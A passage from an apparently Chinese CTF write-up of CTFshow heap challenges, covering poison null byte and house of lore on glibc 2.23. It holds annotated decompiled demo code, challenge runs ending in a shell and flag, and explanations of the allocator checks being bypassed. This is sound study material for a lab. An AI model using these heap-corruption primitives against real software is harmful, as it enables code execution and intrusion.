        \u6211\u4eec\u4ece0x7fffffffde00\u53bb\u770b\u4e00\u4e2a\u5b8c\u6574\u7684chunk<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u53ef\u4ee5\u53d1\u73b0chunk\u5df2\u7ecf\u4f2a\u9020\u597d\u4e86\uff0c\u4e4b\u524d\u4f2a\u9020\u7684size\u548cfd\u4e5f\u662f\u80fd\u4e00\u773c\u770b\u5230<\/p>\n\n\n\n
        \u73b0\u5728chunk\u5c31\u6ee1\u8db3\u68c0\u67e5\u7684\u6761\u4ef6\u53ef\u4ee5\u88abfree\u4e86<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u53ef\u4ee5\u53d1\u73b0fake chunk1\u5df2\u7ecf\u8fdb\u5165\u4e86fastbin\u4e4b\u540e\u6211\u4eec\u53ef\u4ee5\u628a\u5b83\u7533\u8bf7\u56de\u6765<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5df2\u7ecf\u53ef\u4ee5\u5199\u5165\u4e86\uff0c\u6539\u53d8\u4e86\u6808\u4e0a\u7684\u503c<\/p>\n\n\n\n
        \u6700\u540e\u62ff\u4e2aflag<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        pwn152(poison_null_byte)<\/h2>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        poison_null_byte<\/p>\n\n\n\n
        \u8fd9\u4e2a\u77e5\u8bc6\u8fd8\u6ca1\u6709\u89c1\u8fc7\u5462hh\uff0c\u5148checksec\u4e00\u4e0b<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        64\u4f4d\u5f00\u4e86canary\u548cnx,\u8fd0\u884c\u4e00\u4e0b\u770b\u770b\u6f14\u793a<\/p>\n\n\n\n
        faetong@faetong-virtual-machine:~\/pwnit$ .\/pwn152\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Posion_null_byte                                        \n    * *************************************                           \n\u5f53\u5b58\u5728 off by null \u7684\u65f6\u5019\u53ef\u4ee5\u4f7f\u7528\u8be5\u6280\u672f\n\u7533\u8bf7 0x100 \u7684 chunk a\na \u5728: 0x1eace2a0\n\u56e0\u4e3a\u6211\u4eec\u60f3\u8981\u6ea2\u51fa chunk a\uff0c\u6240\u4ee5\u9700\u8981\u77e5\u9053\u4ed6\u7684\u5b9e\u9645\u5927\u5c0f: 0x108\nb: 0x1eace3b0\nc: 0x1eace5c0\n\u53e6\u5916\u518d\u7533\u8bf7\u4e86\u4e00\u4e2a chunk c\uff1a0x1eace6d0\uff0c\u9632\u6b62 free \u7684\u65f6\u5019\u4e0e top chunk \u53d1\u751f\u5408\u5e76\u7684\u60c5\u51b5\n\u4f1a\u68c0\u67e5 chunk size \u4e0e next chunk \u7684 prev_size \u662f\u5426\u76f8\u7b49\uff0c\u6240\u4ee5\u8981\u5728\u540e\u9762\u4e00\u4e2a 0x200 \u6765\u7ed5\u8fc7\u68c0\u67e5\nb \u7684 size: 0x211\n\u5047\u8bbe\u6211\u4eec\u5199 chunk a \u7684\u65f6\u5019\u591a\u5199\u4e86\u4e00\u4e2a 0x00 \u5728 b \u7684 size \u7684 p \u4f4d\u4e0a\nb \u73b0\u5728\u7684 size: 0x200\nc \u7684 prev_size \u662f 0\n\u4f46\u4ed6\u6839\u636e chunk b \u7684 size \u627e\u7684\u65f6\u5019\u4f1a\u627e\u5230 b+0x1f0 \u90a3\u91cc\uff0c\u6211\u4eec\u5c06\u4f1a\u6210\u529f\u7ed5\u8fc7 chunk \u7684\u68c0\u6d4b chunksize(P) == 0x200 == 0x200 == prev_size (next_chunk(P))\n\u7533\u8bf7\u4e00\u4e2a 0x100 \u5927\u5c0f\u7684 b1: 0x1eace7e0\n\u73b0\u5728\u6211\u4eec malloc \u4e86 b1 \u4ed6\u5c06\u4f1a\u653e\u5728 b \u7684\u4f4d\u7f6e\uff0c\u8fd9\u65f6\u5019 c \u7684 prev_size \u4f9d\u7136\u662f: 0\n\u4f46\u662f\u6211\u4eec\u4e4b\u524d\u5199 0x200 \u90a3\u4e2a\u5730\u65b9\u5df2\u7ecf\u6539\u6210\u4e86: 200\n\u63a5\u4e0b\u6765 malloc 'b2', \u4f5c\u4e3a 'victim' chunk.\nb2 \u7533\u8bf7\u5728: 0x1eace8f0\n\u73b0\u5728 b2 \u586b\u5145\u7684\u5185\u5bb9\u662f:\nBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\n\u73b0\u5728\u5bf9 b1 \u548c c \u8fdb\u884c free \u56e0\u4e3a c \u7684 prev_size \u662f 0x210\uff0c\u6240\u4ee5\u4f1a\u628a\u4ed6\u4fe9\u7ed9\u5408\u5e76\uff0c\u4f46\u662f\u8fd9\u65f6\u5019\u91cc\u9762\u8fd8\u5305\u542b b2 \u5450.\n\u8fd9\u65f6\u5019\u6211\u4eec\u7533\u8bf7\u4e00\u4e2a 0x300 \u5927\u5c0f\u7684 chunk \u5c31\u53ef\u4ee5\u8986\u76d6\u7740 b2 \u4e86\nd \u7533\u8bf7\u5230\u4e86: 0x1eace980\uff0c\u6211\u4eec\u586b\u5145\u4e00\u4e0b d \u4e3a \"D\"\n\u73b0\u5728 b2 \u7684\u5185\u5bb9\u5c31\u662f:\nBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\n$sh \n$ $ cat flag\nflag{Inoue_Takina}\n$ \n<\/code><\/pre>\n\n\n\n
        \u524d\u9762\u8fd8\u80fd\u770b\u61c2\uff0c\u4f46\u662f\u540e\u9762\u5c31\u6709\u4e9b\u61f5\u4e86<\/p>\n\n\n\n
        \u4ec0\u4e48\u662fpoison_null_byte\uff08\u53c8\u53eb Off-by-Null \uff09<\/h3>\n\n\n\n
        \n
        Poison Null Byte = \u5229\u7528\u4e00\u4e2a\u5b57\u8282\u7684\u6ea2\u51fa\uff0c\u5c06\u4e0b\u4e00\u4e2a chunk \u7684 size \u5b57\u6bb5\u5c3e\u5b57\u8282\u6e05\u96f6\uff0c\u8fdb\u800c\u6b3a\u9a97 unlink \u5408\u5e76\u673a\u5236\uff0c\u6700\u7ec8\u5b9e\u73b0\u5806\u5757\u91cd\u53e0\uff08overlapping chunks\uff09\u3002<\/strong><\/p>\n\n\n\n
        \u5927\u767d\u8bdd\u603b\u7ed3\uff1a<\/p>\n\n\n\n
        \u53ea\u8981\u4f60\u80fd\u5411\u4e0b\u4e00\u4e2a chunk \u7684 size \u591a\u5199\u4e00\u4e2a\u5b57\u8282 0x00\uff0c\u5c31\u80fd\u628a\u5b83\u7684 size \u6539\u5c0f\uff0c\u6b3a\u9a97 GLIBC\uff0c\u8ba9\u4f60\u5f3a\u884c\u62ff\u5230\u672c\u4e0d\u5c5e\u4e8e\u4f60\u7684 chunk\u3002<\/strong><\/p>\n<\/div>\n\n\n\n
        \u597d\u50cf\u53c8\u662f\u60f3\u529e\u6cd5\u6539size<\/p>\n\n\n\n
        \u4e3a\u4ec0\u4e48\u6e05\u96f6\u4e00\u4e2a byte \u5c31\u80fd\u7834\u574f chunk \u7684 size\uff1f<\/h3>\n\n\n\n
        \u56e0\u4e3a chunk size \u662f 8 \u5b57\u8282\u5bf9\u9f50\uff1a<\/p>\n\n\n\n
        \u4f8b\u5982 chunk b \u7684 size = 0x211<\/strong><\/p>\n\n\n\n
        \u5c3e\u5b57\u8282\u662f 0x11<\/strong><\/p>\n\n\n\n
        0x0000000000000211\n<\/code><\/pre>\n\n\n\n

        \u5982\u679c\u6211\u4eec off-by-null \u6ea2\u51fa\uff0c\u628a\u5c3e\u5b57\u8282\u5199\u6210 0x00\uff1a<\/strong><\/p>\n\n\n\n
        0x0000000000000200<\/code><\/pre>\n\n\n\n

        size \u5c31\u53d8\u6210\uff1a<\/strong><\/p>\n\n\n\n
        0x200\uff08512\uff09<\/code><\/pre>\n\n\n\n
        chunk b \u7684\u5927\u5c0f\u88ab\u5f3a\u884c\u7f29\u5c0f\u4e86\uff08\u672c\u6765\u662f 0x211\uff09\u3002<\/p>\n\n\n\n
        \u8fd9\u4e00\u6b65\u5c31\u662f\u6838\u5fc3\uff1a\u5229\u7528 off-by-one \u5199 0x00 \u6539\u5199 size\u3002\u3001<\/strong><\/p>\n\n\n\n
        \u4e3a\u4ec0\u4e48\u53ef\u4ee5\u5229\u7528<\/h3>\n\n\n\n
        free() \u5408\u5e76 chunk \u65f6\u8981\u8fdb\u884c\u68c0\u67e5\uff1a<\/p>\n\n\n\n
        \u5408\u5e76\u7684\u6761\u4ef6\uff08\u5173\u952e\uff09\uff1a<\/h3>\n\n\n\n
        \n
        next_chunk->prev_size == this_chunk->size<\/strong><\/p>\n\n\n\n
        \u5982\u679c\u6211\u4eec\u628a size \u6539\u5c0f\uff0c\u5c31\u53ef\u4ee5\u5236\u9020\u4e00\u4e2a\u5047\u7684 size\uff0c\u4f7f\u4e24\u4e2a chunk\u201c\u5339\u914d\u201d\uff0c\u4ece\u800c\u5408\u5e76\u51fa\u4e00\u4e2a\u5927 chunk\u3002<\/p>\n\n\n\n
        \u6700\u7ec8\u7ed3\u679c\u5c31\u662f\uff1a<\/p>\n\n\n\n
        \u4f60\u53ef\u4ee5\u5236\u9020\u4e24\u4e2a chunk \u91cd\u53e0\uff0c\u4ece\u800c\u8986\u76d6\u4e0d\u5e94\u8be5\u8986\u76d6\u7684\u6570\u636e<\/strong><\/p>\n<\/div>\n\n\n\n

        \u4ee3\u7801\u6ce8\u91ca\uff0c\u7406\u6e05\u6b65\u9aa4<\/h3>\n\n\n\n
        void __cdecl demo()\n{\n  int real_a_size; \/\/ [rsp+4h] [rbp-4Ch]\n  uint8_t *ptr; \/\/ [rsp+8h] [rbp-48h]\n  uint8_t *b; \/\/ [rsp+10h] [rbp-40h]\n  uint8_t *c; \/\/ [rsp+18h] [rbp-38h]\n  void *barrier; \/\/ [rsp+20h] [rbp-30h]\n  uint8_t *b1; \/\/ [rsp+38h] [rbp-18h]\n  uint8_t *b2; \/\/ [rsp+40h] [rbp-10h]\n  uint8_t *d; \/\/ [rsp+48h] [rbp-8h]\n\n  fwrite(&ptr_, 1u, 0x35u, stderr);\n  fwrite(&ptr__0, 1u, 0x19u, stderr);\n\n  \/\/chunka\n  ptr = (uint8_t *)malloc(0x100u);\n  fprintf(stderr, aA, ptr);\n  real_a_size = malloc_usable_size(ptr);\n  fprintf(stderr, &format_, (unsigned int)real_a_size);\n\n  \/\/\u521b\u5efachunkb\u548cchunkc\n  b = (uint8_t *)malloc(0x200u);\n  fprintf(stderr, \"b: %p\\n\", b);\n  c = (uint8_t *)malloc(0x100u);\n  fprintf(stderr, \"c: %p\\n\", c);\n\n  \/\/\u5206\u914d barrier\uff0c\u9632\u6b62 c \u5408\u5e76 top chunk\n  barrier = malloc(0x100u);\n  fprintf(stderr, &format__0, barrier);\n  fwrite(&ptr__1, 1u, 0x70u, stderr);\n\n  \/\/\u4f2a\u9020 b \u7684 next chunk \u7684 prev_size\n  *((_QWORD *)b + 62) = 512;\n\n  \/\/\u5148 free(b)\uff0c\u8fd9\u6837 b \u8fdb\u5165 unsorted bin\n  free(b);\n  fprintf(stderr, aB, *((_QWORD *)b - 1));\n  fwrite(&ptr__2, 1u, 0x52u, stderr);\n\n  \/\/off-by-null \u6f0f\u6d1e\u89e6\u53d1\uff1a\u5199 0x00\n  ptr[real_a_size] = 0;\n  \/\/ ptr \u7684 length = 0x100\uff0c\u4f46\u6211\u4eec\u5199 real_a_size \u7684\u4f4d\u7f6e\n  \/\/ real_a_size = chunk a \u7684\u771f\u5b9e\u5927\u5c0f = 0x108\n  \/\/ real_a_size \u5904\u662f chunk b \u7684 size \u6700\u540e\u4e00\u5b57\u8282\uff01\n  \/\/ \u6240\u4ee5\u8fd9\u662f Poison Null Byte \u5173\u952e\u64cd\u4f5c\n  \n  fprintf(stderr, aB_0, *((_QWORD *)b - 1));\n  fprintf(stderr, aC, *((_QWORD *)c - 2));\n  fprintf(stderr, &format__1, *((_QWORD *)b - 1), *(_QWORD *)&b[*((_QWORD *)b - 1) - 16]);\n  b1 = (uint8_t *)malloc(0x100u);\n  fprintf(stderr, &format__2, b1);\n  fprintf(stderr, &format__3, *((_QWORD *)c - 2));\n  fprintf(stderr, &format__4, *((_QWORD *)c - 4));\n  fwrite(&ptr__3, 1u, 0x2Eu, stderr);\n\n  \/\/\u7533\u8bf7b2\u53d7\u5bb3\u8005\n  b2 = (uint8_t *)malloc(0x80u);\n  fprintf(stderr, aB2, b2);\n  memset(b2, 66, 0x80u);\n  fprintf(stderr, &format__5, b2);\n  fwrite(&ptr__4, 1u, 0x87u, stderr);\n  free(b1);\n  free(c);\n  fwrite(&ptr__5, 1u, 0x4Cu, stderr);\n\n  \/\/malloc \u4e00\u4e2a\u5927\u5757\u8986\u76d6 b2\n  d = (uint8_t *)malloc(0x300u);\n  fprintf(stderr, aD, d);\n  memset(d, 68, 0x300u);\n  fprintf(stderr, &format__6, b2);\n}<\/code><\/pre>\n\n\n\n
        \u8c03\u8bd5\u4e00\u4e0b\uff0c\u770b\u770b\u53d8\u5316<\/h3>\n\n\n\n
        \u9996\u5148\u662f\u7533\u8bf7\u4e864\u4e2achunk<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u6211\u4eec\u73b0\u5728\u5173\u6ce8chunkb<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        free\u4ee5\u540e<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u53ef\u4ee5\u770b\u5230chunkb\u5f52\u5165\u4e86unsortedbin<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u63a5\u4e0b\u6765\u5c31\u662f\u5199\u51650x00<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        size\u5df2\u7ecf\u53d1\u751f\u4e86\u53d8\u5316\uff0c\u53d8\u6210\u4e860x200\uff0c\u8ba9 unlink \u68c0\u67e5\u901a\u8fc7\uff1a<\/p>\n\n\n\n
        chunksize(B) == prev_size(C)<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u63a5\u4e0b\u6765\u7533\u8bf7b1<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u63a5\u7740\u6211\u4eec\u5c31\u8981\u91ca\u653e2\uff0c3<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u73b0\u5728\u4ed6\u4eec\u662f\u88ab\u5408\u5e76\u4e86\uff0c<\/p>\n\n\n\n
        free(b1) \u548c free(c) \u2192 \u5408\u5e76\u6210\u5927 chunk<\/p>\n\n\n\n
        \u867d\u7136\u4e2d\u95f4\u6709 chunk b2\uff0c\u4f46\u4e5f\u4f1a\u88ab\u5305\u542b\u8fdb\u53bb\uff01<\/p>\n\n\n\n
        malloc \u5927 chunk \u8986\u76d6 b2<\/p>\n\n\n\n
        \u83b7\u5f97\u5806\u5757\u91cd\u53e0 overlapping chunk primitive\u3002<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u53ef\u4ee5\u4ece\u4e0b\u9762\u770b\u770b\u4ed6\u5e72\u4e86\u4e9b\u5565<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u7136\u540e\u5c31\u662f\u7533\u8bf7\u56de\u6765\uff0c\u5199\u5165\u6570\u636e\uff0c\u5c31\u53ef\u4ee5\u6539\u53d8\u4e2d\u9014\u5206\u5272\u7684\u90a3\u51e0\u4e2achunck\u7684\u503c\u4e86<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u8981\u5199\u516568(0x44)<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u53ef\u4ee5\u770b\u5230\u5df2\u7ecf\u5165\u4fb5\u4e86\u5f88\u591a\u76840x44\uff0c\u5c31\u662f\u8986\u76d6\u4e86chunkb2\u7684\u5185\u5bb9,\u6700\u540e\u62ff\u4e2aflag\u5427<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5e94\u8be5\u5c31\u662f\u4e24\u9762\u5939\u51fb\u5e72\u6389\u4e86b2<\/p>\n\n\n\n
        pwn153(house_of_lore)<\/h2>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        house_of_lore\uff0c\u524d\u9762\u5b66\u4e86\u4ee5\u4e0bhouse_of_spirit\uff0c\u73b0\u5728\u662fhouse_of_lore<\/p>\n\n\n\n
        \u5148checskec<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        64\u4f4d\u5f00\u4e86canary\u548cnx<\/p>\n\n\n\n
        \u8fd0\u884c\u4e00\u4e0b\u770b\u770b\u6f14\u793a<\/p>\n\n\n\n
        \u5c0f\u63d0\u793a\uff1a\u672c\u5730\u8fd0\u884c\u53ef\u80fd\u9700\u8981\u66f4\u6362libc\u548cld,\u53ef\u4ee5\u7528patchelf<\/p>\n\n\n\n
        faetong@faetong-virtual-machine:~\/pwnit$ .\/pwn153\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : House_of_lore                                           \n    * *************************************                           \n\u5b9a\u4e49\u4e86\u4e24\u4e2a\u6570\u7ec4stack_buffer_1 \u5728 0x7fffa4f547f0\nstack_buffer_2 \u5728 0x7fffa4f547d0\n\u7533\u8bf7\u7b2c\u4e00\u5757\u5c5e\u4e8e fastbin \u7684 chunk \u5728 0x1b7b010\n\u5728\u6808\u4e0a\u4f2a\u9020\u4e00\u5757 fake chunk\n\u8bbe\u7f6e fd \u6307\u9488\u6307\u5411 victim chunk\uff0c\u6765\u7ed5\u8fc7 small bin \u7684\u68c0\u67e5\uff0c\u8fd9\u6837\u7684\u8bdd\u5c31\u80fd\u628a\u5806\u6808\u5730\u5740\u653e\u5728\u5230 small bin \u7684\u5217\u8868\u4e0a\n\u8bbe\u7f6e stack_buffer_1 \u7684 bk \u6307\u9488\u6307\u5411 stack_buffer_2\uff0c\u8bbe\u7f6e stack_buffer_2 \u7684 fd \u6307\u9488\u6307\u5411 stack_buffer_1 \u6765\u7ed5\u8fc7\u6700\u540e\u4e00\u4e2a malloc \u4e2d small bin corrupted, \u8fd4\u56de\u6307\u5411\u6808\u4e0a\u5047\u5757\u7684\u6307\u9488\u53e6\u5916\u518d\u5206\u914d\u4e00\u5757\uff0c\u907f\u514d\u4e0e top chunk \u5408\u5e76 0x1b7b080\nFree victim chunk 0x1b7b010, \u4ed6\u4f1a\u88ab\u63d2\u5165\u5230 fastbin \u4e2d\n\n\u6b64\u65f6 victim chunk \u7684 fd\u3001bk \u4e3a\u96f6\nvictim->fd: (nil)\nvictim->bk: (nil)\n\n\u8fd9\u65f6\u5019\u53bb\u7533\u8bf7\u4e00\u4e2a chunk\uff0c\u89e6\u53d1 fastbin \u7684\u5408\u5e76\u4f7f\u5f97 victim \u8fdb\u53bb unsortedbin \u4e2d\u5904\u7406\uff0c\u6700\u7ec8\u88ab\u6574\u7406\u5230 small bin \u4e2d 0x1b7b010\n\u73b0\u5728 victim chunk \u7684 fd \u548c bk \u66f4\u65b0\u4e3a unsorted bin \u7684\u5730\u5740\nvictim->fd: 0x7782457c4bd8\nvictim->bk: 0x7782457c4bd8\n\n\u73b0\u5728\u6a21\u62df\u4e00\u4e2a\u53ef\u4ee5\u8986\u76d6 victim \u7684 bk \u6307\u9488\u7684\u6f0f\u6d1e\uff0c\u8ba9\u4ed6\u7684 bk \u6307\u9488\u6307\u5411\u6808\u4e0a\n\u7136\u540e\u7533\u8bf7\u8ddf\u7b2c\u4e00\u4e2a chunk \u5927\u5c0f\u4e00\u6837\u7684 chunk\n\u4ed6\u5e94\u8be5\u4f1a\u8fd4\u56de victim chunk \u5e76\u4e14\u5b83\u7684 bk \u4e3a\u4fee\u6539\u6389\u7684 victim \u7684 bk\n\u6700\u540e malloc \u4e00\u6b21\u4f1a\u8fd4\u56de victim->bk \u6307\u5411\u7684\u90a3\u91cc\np4 = malloc(100)\n\n\u5728\u6700\u540e\u4e00\u4e2a malloc \u4e4b\u540e\uff0cstack_buffer_2 \u7684 fd \u6307\u9488\u5df2\u66f4\u6539 0x7782457c4bd8\n\np4 \u5728\u6808\u4e0a 0x7fffa4f54800\n$sh\n$ $ ls\nflag  ld-2.23.so  ld-2.27.so  libc-2.23.so  libc-2.27.so  pwn150  pwn151  pwn152  pwn153\n$ cat flag\nflag{Inoue_Takina}\n$ \n<\/code><\/pre>\n\n\n\n
        \u6bd4\u8f83\u91cd\u8981\u7684\u5c31\u662f\u7ed5\u8fc7\u68c0\u67e5\u548c\u4fee\u6539\u6307\u9488\uff0c\u63a5\u4e0b\u6765\u5148\u770b\u770b\u77e5\u8bc6\u70b9<\/p>\n\n\n\n
        \u4ec0\u4e48\u662fhouse_of_lore<\/h3>\n\n\n\n
        \u901a\u8fc7 small bin \u7684\u53cc\u5411\u94fe\u8868\u5b8c\u6574\u6027\u68c0\u67e5\uff0c\u628a\u201c\u6808\u4e0a\u7684\u4f2a chunk\u201d\u5408\u6cd5\u5730\u6302\u8fdb small bin\uff0c\u8ba9 malloc \u8fd4\u56de\u6808\u5730\u5740\u3002<\/p>\n\n\n\n
        \u524d\u63d0\uff1aglibc<=2.27,\u8fd9\u9053\u9898\u662f2.23<\/p>\n\n\n\n
        smoll bin\u4f7f\u7528\u53cc\u5411\u94fe\u8868<\/p>\n\n\n\n
        \u6211\u4eec\u9700\u8981\u7ed5\u8fc7\u7684\u68c0\u67e5\u662f\uff1a<\/p>\n\n\n\n
        if (bck->fd != victim)\n    malloc_printerr(\"smallbin corrupted\");\n<\/code><\/pre>\n\n\n\n
        \u6ce8\u91ca\u4ee3\u7801<\/h3>\n\n\n\n
        void __cdecl demo()\n{\n  const void **victim; \/\/ [rsp+10h] [rbp-80h]\n  void *p5; \/\/ [rsp+20h] [rbp-70h]\n  char *p4; \/\/ [rsp+38h] [rbp-58h]\n  intptr_t *stack_buffer_2[3]; \/\/ [rsp+40h] [rbp-50h] BYREF\n  intptr_t *stack_buffer_1[4]; \/\/ [rsp+60h] [rbp-30h] BYREF\n  unsigned __int64 v5; \/\/ [rsp+88h] [rbp-8h]\n\n  v5 = __readfsqword(0x28u);\n  memset(stack_buffer_1, 0, sizeof(stack_buffer_1));\n  memset(stack_buffer_2, 0, sizeof(stack_buffer_2));\n  fwrite(&ptr_, 1u, 0x15u, stderr);\n  fprintf(stderr, aStackBuffer1, stack_buffer_1);\n  fprintf(stderr, aStackBuffer2, stack_buffer_2);\n\n  \/\/\u7533\u8bf7victim chunk\n  victim = (const void **)malloc(0x64u);\n  fprintf(stderr, &format_, victim);\n  fwrite(&ptr__0, 1u, 0x21u, stderr);\n  fwrite(&ptr__1, 1u, 0x88u, stderr);\n  stack_buffer_1[0] = 0;\n  stack_buffer_1[1] = 0;\n\n  \/\/fake chunk size \u6307\u5411 victim \u7684chunk header\n  \/\/\u4f2a\u9020\u5408\u6cd5 small bin chunk size\n  stack_buffer_1[2] = (intptr_t *)(victim - 2);\n  \/\/stack_buffer_1->size = victim->size\n  \n  fwrite(&ptr__2, 1u, 0xCBu, stderr);\n\n  \/\/\u6784\u9020 fake \u53cc\u5411\u94fe\u8868,\u7528\u4e8e\u7ed5\u8fc7small bin\u7684\u5b8c\u6574\u6027\u68c0\u67e5\n  stack_buffer_1[3] = (intptr_t *)stack_buffer_2;\n  stack_buffer_2[2] = (intptr_t *)stack_buffer_1;\n\n  \/\/\u9632\u6b62 top \u5408\u5e76\n  p5 = malloc(0x3E8u);\n  fprintf(stderr, &format__0, p5);\n  fprintf(stderr, aFreeVictimChun, victim);\n\n  \/\/\u91ca\u653e victim\uff08\u8fdb\u5165 fastbin\uff09\n  free(victim);\n  fwrite(&ptr__3, 1u, 0x28u, stderr);\n  fprintf(stderr, \"victim->fd: %p\\n\", *victim);\n  fprintf(stderr, \"victim->bk: %p\\n\\n\", victim[1]);\n  fprintf(stderr, &format__1, victim);\n\n  \/\/\u89e6\u53d1 fastbin consolidate \u2192 small bin\n  \/\/fastbin \u2192 unsorted bin \u2192 small bin\n  malloc(0x4B0u);\n  fwrite(&ptr__4, 1u, 0x43u, stderr);\n  fprintf(stderr, \"victim->fd: %p\\n\", *victim);\n  fprintf(stderr, \"victim->bk: %p\\n\\n\", victim[1]);\n  fwrite(&ptr__5, 1u, 0x5Fu, stderr);\n\n  \/\/\u6f0f\u6d1e\u70b9\uff1a\u8986\u76d6 victim->bk\n  victim[1] = stack_buffer_1;\n  fwrite(&ptr__6, 1u, 0x35u, stderr);\n  fwrite(&ptr__7, 1u, 0x4Eu, stderr);\n\n  \/\/\u7b2c\u4e00\u6b21 malloc\uff1a\u53d6\u8d70 victim\n  malloc(0x64u);\n  fwrite(&ptr__8, 1u, 0x39u, stderr);\n  \/\/bin \u2192 stack_buffer_1 \u2192 stack_buffer_2 \u2192 bin\n\n  \/\/\u7b2c\u4e8c\u6b21 malloc\uff1a\u8fd4\u56de\u6808\u5730\u5740\n  p4 = (char *)malloc(0x64u);\n  fwrite(\"p4 = malloc(100)\\n\", 1u, 0x11u, stderr);\n  fprintf(stderr, asc_4018D8, stack_buffer_2[2]);\n  fprintf(stderr, aP4, p4);\n  *((_QWORD *)p4 + 5) = demoflag;\n}<\/code><\/pre>\n\n\n\n
